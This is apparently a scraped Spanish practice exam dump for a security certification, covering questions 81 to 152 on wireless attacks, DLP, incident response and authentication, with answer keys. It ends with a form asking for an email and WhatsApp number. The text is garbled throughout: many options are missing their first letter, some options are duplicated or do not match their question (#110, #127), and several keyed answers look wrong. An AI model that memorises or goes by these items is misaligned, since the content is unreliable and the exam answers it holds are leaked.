A. Un punto de acceso externo está participando en un ataque evil-twin
B. s necesario aumentar la señal del WAP en esa sección del edificio
C. os certificados han caducado en los dispositivos y necesitan ser reinstalados
D. Los usuarios de esa sección del edificio están en una VLAN bloqueada por el cortafuegos
Ver respuesta
Respuesta correcta: A
Cuestionar #81
Una organización está preocupada por la posibilidad de que hackers entren en una instalación y conecten una caja Kali Linux accesible remotamente. ¿Cuál de las siguientes debería ser la primera línea de defensa contra un ataque de este tipo? (Elija dos.)
A. Análisis de las redes sociales
B. ormación anual sobre seguridad de la información
C. Gamificación
D. Campaña de phishing
Ver respuesta
Respuesta correcta: BC
Cuestionar #82
Un administrador de seguridad quiere asegurarse de que todos los servidores en la nube tengan software preinstalado para facilitar el análisis de vulnerabilidades y la supervisión continua. Cuál de los siguientes conceptos debería utilizar el administrador?
A. provisionamiento
B. uesta en escena
C. uesta en escena
D. Garantía de calidad
Ver respuesta
Respuesta correcta: A
Cuestionar #83
¿Cuál de las siguientes es la forma MÁS eficaz de detectar fallos de seguridad presentes en bibliotecas de terceros integradas en software antes de que se ponga en producción?
A. mplear técnicas diferentes para las validaciones del lado del servidor y del lado del cliente
B. tilizar un sistema de control de versiones diferente para las bibliotecas de terceros
C. mplementar un escaneo de vulnerabilidades para evaluar las dependencias antes en SDLC
D. umentar el número de pruebas de penetración antes del lanzamiento del software
Ver respuesta
Respuesta correcta: C
Cuestionar #84
¿Cuál de las siguientes opciones utiliza SAML para la autenticación?
A. TOTP
B. Federación
C. Kerberos
D. HOTP
Ver respuesta
Respuesta correcta: B
Cuestionar #85
SIMULACIÓNUn administrador de sistemas necesita instalar una nueva red inalámbrica para el acceso autenticado de invitados. La red inalámbrica debe soportar 802.1X utilizando la encriptación y el protocolo más seguros disponibles.INSTRUCCIONESRealice los siguientes pasos:4. Configure el servidor RADIUS.5. Configure el controlador WiFi.6. Preconfigure el cliente para un invitado entrante. Las credenciales AD del invitado son:Usuario: guest01Contraseña: guestpassSi en algún momento desea volver al estado inicial de la simulación, haga clic en
A.
Ver respuesta
Respuesta correcta: A
Cuestionar #86
Un analista de seguridad recibe una alerta SIEM de que alguien ha iniciado sesión en la cuenta de prueba appadmin, que sólo se utiliza para la detección temprana de ataques. A continuación, el analista de seguridad revisa el siguiente registro de la aplicación: ¿Cuál de las siguientes conclusiones puede extraer el analista de seguridad?
A. Se está llevando a cabo un ataque de repetición contra la aplicación
B. e está llevando a cabo un ataque de inyección contra un sistema de autenticación de usuarios
C. La contraseña de una cuenta de servicio puede haber sido cambiada, resultando en continuos inicios de sesión fallidos dentro de la aplicación
D. Un ataque de escáner de vulnerabilidades con credenciales está probando varios CVEs contra la aplicación
Ver respuesta
Respuesta correcta: B
Cuestionar #87
¿Cuál de las siguientes opciones implica la inclusión de código en la base de código principal tan pronto como se escribe?
A. Control continuo
B. Despliegue continuo
C. alidación continua
D. Integración continua
Ver respuesta
Respuesta correcta: D
Cuestionar #88
Una empresa está auditando la forma en que se maneja la información personal de sus clientes europeos. ¿Cuál de las siguientes opciones debería consultar la empresa?
A. DPR
B. SO
C. IST
D. CI DSS
Ver respuesta
Respuesta correcta: A
Cuestionar #89
Una organización ha activado un plan de respuesta a incidentes debido a un brote de malware en su red. La organización ha recurrido a un equipo forense que ha identificado un servidor Windows con acceso a Internet como el punto probable de compromiso inicial. Se sabe que la familia de malware detectada se distribuye accediendo manualmente a los servidores y ejecutando el código malicioso. ¿Cuál de las siguientes acciones sería la MEJOR para evitar la reinfección desde el vector de infección?
A. Impedir las conexiones a través de TFTP desde la red internA
B. Crear una regla de cortafuegos que bloquee un 22 desde Internet al servidor
C. Desactivar el intercambio de archivos a través del puerto 445 con el servidor
D. Bloquee el puerto 3389 entrante desde redes no confiables
Ver respuesta
Respuesta correcta: C
Cuestionar #90
Un analista de seguridad está revisando el último informe de análisis de vulnerabilidades de un servidor web tras un incidente. El informe de vulnerabilidad no mostró hallazgos preocupantes. La vulnerabilidad que se utilizó para explotar el servidor está presente en los informes históricos de análisis de vulnerabilidades, y hay un parche disponible para la vulnerabilidad. ¿Cuál de las siguientes es la causa MÁS probable?
A. os parches de seguridad no se instalaron debido a una incompatibilidad de versiones
B. n adversario alteró los informes de escaneo de vulnerabilidades
C. Se utilizó una vulnerabilidad de día cero para explotar el servidor web
D. El escaneo reportó un falso negativo para la vulnerabilidad
Ver respuesta
Respuesta correcta: D
Cuestionar #91
Una empresa quiere restringir el envío por correo electrónico de documentos PHI. La empresa está implementando una solución DLP. Para restringir los documentos PHI, ¿cuál de las siguientes acciones debe realizarse PRIMERO?
A. etención
B. Gobernanza
C. lasificación
D. Gestión del cambio
Ver respuesta
Respuesta correcta: C
Cuestionar #92
Los empleados de una empresa están recibiendo mensajes de texto no solicitados en sus teléfonos móviles corporativos. Los mensajes de texto no solicitados contienen un enlace para restablecer la contraseña. ¿Cuál de los siguientes ataques se está utilizando contra la empresa?
A. hishing
B. ishing
C. Pesca
D. Spam
Ver respuesta
Respuesta correcta: C
Cuestionar #93
Una empresa se traslada a una nueva ubicación. El administrador de sistemas ha proporcionado los siguientes requisitos para la sala de servidores al personal de las instalaciones:-Niveles de energía constantes en caso de caídas de tensión o picos de voltaje-Un mínimo de 30 minutos de tiempo de funcionamiento después de un corte de energía-Capacidad para desencadenar cierres de gracia de los sistemas críticos¿Cuál de los siguientes sería el MEJOR cumplimiento de los requisitos?
A. antenimiento de un generador de gas de reserva
B. so de grandes supresores de sobretensiones en equipos informáticos
C. onfiguración de PDUs gestionadas para monitorizar los niveles de potencia
D. esplegar un dispositivo SAI de tamaño adecuado y conectado a la red
Ver respuesta
Respuesta correcta: D
Cuestionar #94
¿Cuál de las siguientes opciones sería la MÁS eficaz para contener un ataque de rápida propagación que afecta a un gran número de organizaciones?
A. Aprendizaje automático
B. NS sumidero
C. ista de bloqueo
D. Honeypot
Ver respuesta
Respuesta correcta: B
Cuestionar #95
Durante una prueba de penetración reciente, el probador descubre que se han filtrado grandes cantidades de datos a lo largo de 12 meses a través de Internet. El probador de penetración detiene la prueba para informar al cliente de los hallazgos. ¿Cuál de los siguientes debería ser el SIGUIENTE paso del cliente para mitigar el problema?
A. ealizar un escaneo completo de vulnerabilidades para identificar posibles vulnerabilidades
B. ealizar la contención en los servidores y recursos críticos
C. evise el cortafuegos e identifique el origen de la conexión activA
D. esconectar toda la infraestructura de internet
Ver respuesta
Respuesta correcta: B
Cuestionar #96
Un analista de seguridad descubre que la base de datos de nombres de usuario y contraseñas de una empresa se ha publicado en un foro de Internet. Los nombres de usuario y las contraseñas se almacenan en texto sin formato. ¿Cuál de las siguientes medidas mitigaría el daño causado por este tipo de filtración de datos en el futuro?
A. rear controles DLP que impidan que los documentos salgan de la red
B. mplementar salting y hashing
C. onfigurar el filtro de contenidos web para bloquear el acceso al foro
D. Aumentar los requisitos de complejidad de las contraseñas
Ver respuesta
Respuesta correcta: B
Cuestionar #97
¿Cuál de los siguientes es un ejemplo de evitación de riesgos?
A. nstalación de actualizaciones de seguridad directamente en producción para agilizar la corrección de vulnerabilidades
B. ontratar un seguro para prepararse para las pérdidas económicas asociadas a las hazañas
C. o instalar software nuevo para evitar errores de compatibilidad
D. o tomar medidas preventivas para impedir el robo de equipos
Ver respuesta
Respuesta correcta: C
Cuestionar #98
Un arquitecto de seguridad está trabajando en una solución de correo electrónico para el envío de datos sensibles. Sin embargo, actualmente no hay fondos disponibles en el presupuesto para construir infraestructura adicional. ¿Cuál de las siguientes opciones debería elegir el arquitecto?
A. OP
B. PSec
C. MAP
D. GP
Ver respuesta
Respuesta correcta: D
Cuestionar #99
¿Cuál de los siguientes puede funcionar como método de autenticación y como mecanismo de alerta de intentos de acceso no autorizados?
A. arjeta inteligente
B. Notificaciones push
C. Servicio de certificación
D. Basado en HMAC
E. ontraseña de un solo uso
Ver respuesta
Respuesta correcta: B
Cuestionar #100
Una empresa está implantando una solución de DLP en el servidor de archivos. En el servidor de archivos se almacenan PII, información financiera e información sanitaria. Dependiendo del tipo de datos alojados en el servidor de archivos, la empresa desea que se asignen diferentes reglas de DLP a los datos. ¿Cuál de las siguientes medidas debería tomar la empresa para lograr este objetivo?
A. lasificar los datos
B. nmascarar los datos
C. signar el propietario de la aplicación
D. ealizar un análisis de riesgos
Ver respuesta
Respuesta correcta: A
Cuestionar #101
Ann, una clienta, recibió una notificación de su compañía hipotecaria en la que se indicaba que su IIP podría compartirse con socios, afiliados y asociados para mantener las operaciones comerciales cotidianas. ¿Cuál de los siguientes documentos recibió Ana?
A. Un aviso anual sobre protección de datos
B. Un acuerdo de confidencialidad
C. Acuerdo de usuario privilegiado
D. Un memorándum de acuerdo
Ver respuesta
Respuesta correcta: A
Cuestionar #102
¿Cuál de los siguientes documentos especifica qué hacer en caso de pérdida catastrófica de un sistema físico o virtual?
A. lan de conservación de datos
B. lan de respuesta a incidentes
C. lan de recuperación en caso de catástrofe
D. Plan de comunicación
Ver respuesta
Respuesta correcta: C
Cuestionar #103
El correo electrónico de la empresa de un empleado está configurado con acceso condicional y requiere que se active y utilice MFA. Un ejemplo de MFA es una llamada telefónica y:
A. na notificación push
B. una contraseña
C. n mensaje SMS
D. una aplicación de autenticación
Ver respuesta
Respuesta correcta: B
Cuestionar #104
Una organización acaba de implantar un nuevo sistema de seguridad. Las leyes locales establecen que los ciudadanos deben ser notificados antes de encontrarse con el mecanismo de detección para disuadir actividades maliciosas. ¿Cuál de las siguientes medidas se está aplicando?
A. arjetas de proximidad con guardias
B. alla con electricidad
C. rones con alarma
D. ensores de movimiento con señalización
Ver respuesta
Respuesta correcta: D
Cuestionar #105
Un técnico de respuesta a incidentes recogió un dispositivo móvil durante una investigación. Cuál de las siguientes acciones debe realizar el técnico para mantener la cadena de custodia?
A. ocumentar la recogida y exigir un visto bueno cuando cambie la posesión
B. uarde el dispositivo bajo llave en una caja fuerte u otro lugar seguro para evitar robos o alteraciones
C. olocar el dispositivo en una jaula de Faraday para evitar la corrupción de los datos
D. egistrar la recaudación en un libro de contabilidad público protegido por blockchain
Ver respuesta
Respuesta correcta: A
Cuestionar #106
¿Cuál de los siguientes aspectos debería preocupar a los clientes que participan en acuerdos con desarrolladores de interfaz de usuario a la hora de considerar el uso de estos productos en proyectos altamente sensibles?
A. onfiguraciones débiles
B. Actividades de integración
C. uentas de usuario inseguras
D. Desarrollo de código externalizado
Ver respuesta
Respuesta correcta: A
Cuestionar #107
¿Cuál de los siguientes procedimientos se llevaría a cabo una vez identificada la causa raíz de un incidente de seguridad para ayudar a evitar que se produzcan futuros incidentes?
A. Recorridos
B. Lecciones aprendidas
C. lineación del marco de ataque
D. Contención
Ver respuesta
Respuesta correcta: B
Cuestionar #108
¿Cuál de las siguientes opciones proporcionaría directrices sobre cómo etiquetar nuevos dispositivos de red como parte de la configuración inicial?
A. squema IP
B. onfiguración de la línea de base de la aplicación
C. olítica estándar de convenciones de nomenclatura
D. AN inalámbrica y diagrama del perímetro de la red
Ver respuesta
Respuesta correcta: C
Cuestionar #109
Un analista de seguridad está investigando lo que parece ser un acceso no autorizado a una aplicación web corporativa. El analista de seguridad revisa los registros del servidor web y encuentra las siguientes entradas: ¿Cuál de los siguientes ataques con contraseña se está produciendo?
A. iccionario
B. Fuerza bruta
C. esa arco iris
D. ulverización
Ver respuesta
Respuesta correcta: B
Cuestionar #110
Una organización está planeando implantar una nueva política de dispositivos móviles y entregar a cada empleado un nuevo portátil. Estos portátiles accederían al sistema operativo corporativo de los usuarios de forma remota y les permitirían utilizar los portátiles para fines ajenos a sus funciones laborales. ¿Cuál de los siguientes modelos de despliegue se está utilizando?
A. Fuerza bruta
B. egistrador de teclas
C. iccionario
D. Arco iris
Ver respuesta
Respuesta correcta: C
Cuestionar #111
Se han detectado dispositivos no autorizados en la red interna. La ubicación de los dispositivos se ha rastreado hasta los puertos Ethernet situados en las salas de conferencias. Cuál de los siguientes sería el mejor control técnico a implementar para evitar que estos dispositivos accedan a la red interna?
A. AC
B. LP
C. DS
D. FA
Ver respuesta
Respuesta correcta: A
Cuestionar #112
Para reducir y limitar los costes de software e infraestructura, el Director de Información ha solicitado trasladar los servicios de correo electrónico a la nube. El proveedor de la nube y la organización deben disponer de controles de seguridad para proteger los datos confidenciales. ¿Cuál de los siguientes servicios en la nube se adaptaría MEJOR a la solicitud?
A. aaS
B. aaS
C. aaS
D. SaaS
Ver respuesta
Respuesta correcta: D
Cuestionar #113
Un administrador de seguridad realiza exploraciones semanales de vulnerabilidades en todos los activos de la nube y proporciona un informe detallado. Cuál de las siguientes opciones describe las actividades del administrador?
A. Despliegue continuo
B. Integración continua
C. Propietarios de los datos
D. Procesador de datos
Ver respuesta
Respuesta correcta: D
Cuestionar #114
El Director de Seguridad de la Información (CISO) ha solicitado que un proveedor externo proporcione documentos de apoyo que demuestren que existen controles adecuados para proteger los datos de los clientes. Cuál de los siguientes sería el MEJOR documento que el proveedor externo debería proporcionar al CISO?
A. ertificación de conformidad con el GDPR
B. ateriales de Cloud Security Alliance
C. OC 2 Informe de tipo 2
D. Cuadernos RMF del NIST
Ver respuesta
Respuesta correcta: C
Cuestionar #115
¿Cuál de las siguientes describe una técnica de ingeniería social que trata de explotar el sentido de urgencia de una persona?
A. Un correo electrónico de phishing en el que se indica que se ha concedido una indemnización en metálico que expirará en breve
B. Un mensaje smishing indicando que un paquete está programado para su recogida
C. Una llamada de vishing que solicita una donación a una organización benéfica local
D. Una notificación SPIM que dice ser un agente de la ley encubierto investigando un ciberdelito
Ver respuesta
Respuesta correcta: C
Cuestionar #116
Durante la respuesta a un incidente, un analista aplicó reglas a todo el tráfico entrante en el cortafuegos fronterizo e implementó ACL en cada servidor crítico. Tras una investigación, la empresa se da cuenta de que sigue siendo vulnerable porque el tráfico saliente no está restringido, y el adversario es capaz de mantener una presencia en la red.¿En cuál de las siguientes etapas de la Cyber Kill Chain está operando actualmente el adversario?
A. Reconocimiento
B. Mando y control
C. cciones sobre el objetivo
D. Explotación
Ver respuesta
Respuesta correcta: B
Cuestionar #117
Los analistas de seguridad han observado que la red se inunda de paquetes maliciosos a determinadas horas del día. Cuál de las siguientes opciones deberían utilizar los analistas para investigar este problema?
A. etadatos web
B. onitores de ancho de banda
C. rchivos de sistema
D. uadros de correlación
Ver respuesta
Respuesta correcta: B
Cuestionar #118
Un ingeniero de seguridad está desplegando una nueva red inalámbrica para una empresa. La empresa comparte oficinas con varios inquilinos. Cuál de las siguientes opciones debe configurar el ingeniero en la red inalámbrica para garantizar que los datos confidenciales no queden expuestos a usuarios no autorizados?
A. AP
B. LS
C. TTPS
D. ES
Ver respuesta
Respuesta correcta: D
Cuestionar #119
¿Cuál de las siguientes medidas se utiliza para garantizar la admisibilidad de las pruebas en los procedimientos judiciales cuando se recogen y entregan a las autoridades?
A. adena de custodia
B. Retención legal
C. Registro de sucesos
D. Artefactos
Ver respuesta
Respuesta correcta: A
Cuestionar #120
Un administrador de ciberseguridad necesita implementar un control de seguridad de Capa 7 en una red y bloquear posibles ataques. ¿Cuál de los siguientes puede bloquear un ataque en la Capa 7? (Elija dos.)
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
Ver respuesta
Respuesta correcta: BD
Cuestionar #121
De camino a un edificio seguro, un desconocido entabla conversación con un empleado. El empleado escanea la placa requerida en la puerta mientras el individuo desconocido mantiene la puerta abierta, aparentemente por cortesía, para el empleado. ¿Cuál de las siguientes técnicas de ingeniería social se está utilizando?
A. urf de hombro
B. Ataque a la charca
C. ailgating
D. Suplantación
Ver respuesta
Respuesta correcta: C
Cuestionar #122
Un investigador forense está examinando una serie de pagos no autorizados de los que se informó en el sitio web de la empresa. Algunas entradas de registro inusuales muestran que los usuarios recibieron un correo electrónico para una lista de correo no deseada e hicieron clic en un enlace para intentar darse de baja. Uno de los usuarios informó del correo electrónico al equipo de suplantación de identidad, y el correo electrónico reenviado reveló que el enlace era:Haga clic aquí para darse de baja¿Cuál de las siguientes opciones examinará el forense i
A. nyección SQL
B. Autenticación defectuosa
C. SS
D. SRF
Ver respuesta
Respuesta correcta: D
Cuestionar #123
Un analista de seguridad necesita elaborar un documento que detalle cómo se produjo un incidente de seguridad, los pasos que se dieron para la recuperación y cómo se pueden evitar futuros incidentes. ¿En cuál de las siguientes fases del proceso de respuesta tendrá lugar esta actividad?
A. ecuperación
B. Identificación
C. Lecciones aprendidas
D. Preparación
Ver respuesta
Respuesta correcta: C
Cuestionar #124
Un empleado recibió varios mensajes en un dispositivo móvil. Los mensajes indicaban al empleado que emparejara el dispositivo con otro desconocido. ¿Cuál de las siguientes opciones describe mejor lo que una persona malintencionada podría estar haciendo para provocar este problema?
A. Interferencias
B. luesnarfing
C. taque de gemelos malvados
D. Punto de acceso no autorizado
Ver respuesta
Respuesta correcta: B
Cuestionar #125
¿Cuál de los siguientes tipos de ejercicios del plan de recuperación en caso de catástrofe requiere la menor interrupción de las operaciones informáticas?
A. aralelo
B. A gran escala
C. obremesa
D. Simulación
Ver respuesta
Respuesta correcta: C
Cuestionar #126
Una empresa quiere mejorar la experiencia de los usuarios finales cuando inician sesión en el sitio web de un socio de confianza. La empresa no quiere que los usuarios reciban credenciales separadas para el sitio web del socio. Cuál de las siguientes opciones debería implementarse para permitir a los usuarios autenticarse utilizando sus propias credenciales para iniciar sesión en el sitio web del socio de confianza?
A. Servicio de directorio
B. ervidor AAA
C. ederación
D. Autenticación multifactor
Ver respuesta
Respuesta correcta: C
Cuestionar #127
Un ingeniero de seguridad está revisando los registros de una aplicación SAML que está configurada para utilizar MF
A. Durante esta revisión, el ingeniero nota un alto volumen de inicios de sesión exitosos que no requerían MFA de usuarios que estaban viajando internacionalmente
B.
C.
D.
E.
Ver respuesta
Respuesta correcta: D
Cuestionar #128
¿Cuál de las siguientes opciones puede utilizarse para detectar a un hacker que está robando datos de la empresa a través del puerto 80?
A. tiquetado GPS
B. impieza a distancia
C. emporizador de bloqueo de pantalla
D. EAndroid
Ver respuesta
Respuesta correcta: D
Cuestionar #129
Durante la investigación de un incidente de seguridad, un analista consulta el SIEM de la empresa y ve un evento relativo a un alto tráfico hacia un servidor de comando y control malicioso conocido. Al analista le gustaría determinar el número de estaciones de trabajo de la empresa que pueden estar afectadas por este problema. ¿Cuál de las siguientes opciones puede proporcionar esta información?
A. egistros WAF
B. Registros DNS
C. Registros del sistema
D. Registros de aplicaciones
Ver respuesta
Respuesta correcta: B
Cuestionar #130
Un analista de seguridad necesita poder buscar y correlacionar registros de múltiples fuentes en una única herramienta. ¿Cuál de las siguientes opciones es la MEJOR para que un analista de seguridad tenga esta capacidad?
A. OAR
B. IEM
C. Colectores de registros
D. Almacenamiento conectado a la red
Ver respuesta
Respuesta correcta: B
Cuestionar #131
Si una clave privada actual se ve comprometida, ¿cuál de las siguientes opciones garantizaría que no pueda utilizarse para descifrar todos los datos históricos?
A. Secreto perfecto
B. Criptografía de curva elíptica
C. stiramiento de la llave
D. Cifrado homomórfico
Ver respuesta
Respuesta correcta: A
Cuestionar #132
La cuenta de un usuario se bloquea constantemente. Tras una revisión posterior, un analista de seguridad encontró lo siguiente en el SIEM: ¿Cuál de las siguientes opciones describe lo que está ocurriendo?
A. Un atacante está utilizando un ataque de pulverización de contraseñas contra la cuentA
B. Un atacante está utilizando un ataque de diccionario contra la cuentA
C. Un atacante está utilizando un ataque de fuerza bruta contra la cuentA
D. Un atacante está utilizando un ataque de tabla arco iris contra la cuentA
Ver respuesta
Respuesta correcta: C
Cuestionar #133
Un director de operaciones empresariales teme que un PC crítico para las operaciones de la empresa sufra pronto un costoso fallo de hardware. El gerente está buscando opciones para continuar con las operaciones comerciales sin incurrir en grandes costos. ¿Cuál de las siguientes opciones mitigaría las preocupaciones del gerente?
A. Implantar una actualización completa del sistemA
B. Realizar una migración física a virtual
C. Instalar sistemas de alimentación ininterrumpidA
D. Contratar un seguro de ciberseguridad
Ver respuesta
Respuesta correcta: B
Cuestionar #134
Una empresa ha sufrido recientemente una filtración de datos y se ha determinado que la fuente fue un ejecutivo que estaba cargando un teléfono en una zona pública. Cuál de las siguientes opciones es la que MÁS probablemente habría evitado esta filtración?
A. n cortafuegos
B. n pin del dispositivo
C. n bloqueador de datos USB
D. Biometría
Ver respuesta
Respuesta correcta: C
Cuestionar #135
¿Cuál de las siguientes opciones sería indicativa de un archivo de audio oculto dentro de un fragmento de código fuente?
A. Esteganografía
B. ifrado homomórfico
C. Conjunto de cifrado
D. Cadena de bloques
Ver respuesta
Respuesta correcta: A
Cuestionar #136
Una auditoría rutinaria de reclamaciones de facturación médica reveló que se habían presentado varias reclamaciones sin el conocimiento del abonado. Una revisión de los registros de auditoría del sistema de la empresa de facturación médica indicó que un empleado de la empresa descargó los registros de los clientes y ajustó la información de depósito directo a una cuenta bancaria personal
A. Amenaza interna
B. Ingeniería social
C. iesgo frente a terceros
D. Violación de datos
Ver respuesta
Respuesta correcta: A
Cuestionar #137
Una empresa pone en marcha un sitio web en otro país para obtener información de los usuarios que pueda utilizar una empresa de marketing. La propia empresa no utilizará la información. ¿Cuál de las siguientes funciones asume la empresa?
A. Propietario de los datos
B. Procesador de datos
C. Administrador de datos
D. Recopilador de datos
Ver respuesta
Respuesta correcta: D
Cuestionar #138
Una empresa de minería de criptomonedas ha instalado recientemente una nueva aplicación antivirus en todos sus sistemas de minería. La instalación de la aplicación antivirus se probó en muchos dispositivos personales y no se observó ningún problema. Una vez que la aplicación antivirus se extendió a los servidores, se notificaron problemas constantes. En consecuencia, la empresa decidió eliminar el software de minería. Lo más probable es que la aplicación antivirus clasificara el software como:
A. n rootkit
B. PUP
C. una puerta traserA
D. ransomware
E. RAT
Ver respuesta
Respuesta correcta: B
Cuestionar #139
Un usuario está intentando navegar a un sitio web desde dentro de la red de la empresa utilizando un ordenador de sobremesa. Cuando el usuario teclea la URL, https://www.site.com, el navegador le muestra una advertencia de certificado no coincidente. El usuario no recibe ninguna advertencia cuando visita http://www.anothersite.com. ¿Cuál de las siguientes opciones describe este ataque?
A. n ruta
B. Secuestro de dominios
C. nvenenamiento DNS
D. Gemelo malvado
Ver respuesta
Respuesta correcta: B
Cuestionar #140
Una organización está dejando de utilizar certificados del lado del cliente y del lado del servidor para EAP. A la empresa le gustaría que la nueva solución EAP tuviera la capacidad de detectar puntos de acceso no autorizados. ¿Cuál de las siguientes opciones cumpliría estos requisitos?
A. EAP
B. AP-FAST
C. AP-TLS
D. AP-TTLS
Ver respuesta
Respuesta correcta: B
Cuestionar #141
El consejo de administración de una empresa ha contratado a una compañía de seguros para limitar la responsabilidad civil de la organización. ¿Cuál de las siguientes prácticas de gestión de riesgos describe MEJOR esta situación?
A. ransferencia
B. vitación
C. Mitigación
D. Agradecimiento
Ver respuesta
Respuesta correcta: A
Cuestionar #142
El portátil de un usuario se desconecta constantemente de la red Wi-Fi. Una vez que el portátil se vuelve a conectar, el usuario puede acceder a Internet, pero no puede acceder a las carpetas compartidas ni a otros recursos de la red. ¿Cuál de los siguientes tipos de ataques es más probable que sufra el usuario?
A. Secuestro
B. Interferencias
C. Punto de acceso no autorizado
D. Gemelo malvado
Ver respuesta
Respuesta correcta: D
Cuestionar #143
Un probador de penetración está fuzzing una aplicación para identificar donde se encuentra el EIP de la pila en la memoria. Cuál de los siguientes ataques planea ejecutar?
A. ondición racial
B. Pasar el hash
C. esbordamiento del búfer
D. SS
Ver respuesta
Respuesta correcta: C
Cuestionar #144
Un administrador necesita proteger las contraseñas de los usuarios y se le ha aconsejado que haga un hash de las contraseñas. Cuál de las siguientes opciones describe MEJOR lo que se aconseja hacer al administrador?
A. ealiza una operación matemática sobre las contraseñas que las convierta en cadenas únicas
B. ñadir datos extra a las contraseñas para aumentar su longitud, haciéndolas más difíciles de forzar
C. lmacenar todas las contraseñas del sistema en una tabla arco iris que tenga una ubicación centralizadA
D. Imponer el uso de contraseñas de un solo uso que se cambian en cada sesión de inicio de sesión
Ver respuesta
Respuesta correcta: A
Cuestionar #145
Mientras revisa el enrutador inalámbrico, un administrador de sistemas de una pequeña empresa determina que alguien está suplantando la dirección MAC de un dispositivo autorizado. Dada la siguiente tabla: ¿Cuál de los siguientes debería ser el SIGUIENTE paso del administrador para detectar si hay un sistema fraudulento sin afectar a la disponibilidad?
A. ealizar un barrido ping,
B. Compruebe físicamente cada sistemA
C. Denegar el acceso a Internet al nombre de host "UNKNOWN"
D. Aplicar filtrado MAC
Ver respuesta
Respuesta correcta: A
Cuestionar #146
Se ha establecido una propuesta de seguridad para realizar un seguimiento de las solicitudes de acceso remoto mediante la creación de una línea de base de las propiedades comunes de inicio de sesión de los usuarios. Cuando se detecte una desviación de la línea de base, se activará un desafío MFA. ¿Cuál de las siguientes opciones debe configurarse para implementar la propuesta?
A. Autenticación basada en el contexto
B. utenticación simultánea de iguales
C. rotocolo de autenticación extensiva
D. Control de acceso a la red sin agente
Ver respuesta
Respuesta correcta: A
Cuestionar #147
Un analista recibe varias alertas de actividad de balizamiento para un host de la red. Después de analizar la actividad, el analista observa la siguiente actividad:-Un usuario introduce comptia.org en un navegador web.-El sitio web que aparece no es el sitio comptia.org.-El sitio web es un sitio malicioso del atacante.-Los usuarios de una oficina diferente no tienen este problema.¿Cuál de los siguientes tipos de ataques se observó?
A. taque en ruta
B. nvenenamiento DNS
C. edirección de localizadores (URL)
D. Secuestro de dominios
Ver respuesta
Respuesta correcta: C
Cuestionar #148
¿Cuál de las siguientes opciones describe MEJOR el proceso de documentar quién tiene acceso a las pruebas?
A. rden de volatilidad
B. adena de custodia
C. No repudio
D. Admisibilidad
Ver respuesta
Respuesta correcta: B
Cuestionar #149
¿Cuál de las siguientes opciones responsabiliza al personal que escolta a personal no autorizado?
A. erraduras
B. Insignias
C. ámaras
D. Registros de visitantes
Ver respuesta
Respuesta correcta: D
Cuestionar #150
¿Cuál de los siguientes procesos eliminará datos utilizando un método que permitirá reutilizar el dispositivo de almacenamiento una vez finalizado el proceso?
A. ulverización
B. obrescritura
C. rituración
D. esmagnetización
Ver respuesta
Respuesta correcta: B
Cuestionar #151
Un analista de seguridad necesita gestionar de forma centralizada las credenciales y permisos de los dispositivos de red de la empresa. Deben cumplirse los siguientes requisitos de seguridad:-Todas las acciones realizadas por el personal de la red deben registrarse.-Debe ser posible obtener permisos por comando.-El servidor de autenticación y los dispositivos deben comunicarse a través de TCP.¿Cuál de los siguientes protocolos de autenticación debe elegir el analista?
A. Kerberos
B. HAP
C. ACACS
D. ADIUS
Ver respuesta
Respuesta correcta: C
Cuestionar #152
Un arquitecto de seguridad debe instalar en las salas de conferencia unos puestos de trabajo que permitirán visualizar datos sensibles en grandes pantallas. Debido a la naturaleza de los datos, no pueden almacenarse en las salas de conferencias. El archivo compartido se encuentra en un centro de datos local. ¿Cuál de las siguientes opciones debería recomendar el arquitecto de seguridad para satisfacer MEJOR el requisito?
A. og computing y KVMs
B. DI y clientes ligeros
C. ube privada y DLP
D. ncriptación completa de discos y thick clients
Ver respuesta
Respuesta correcta: B

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: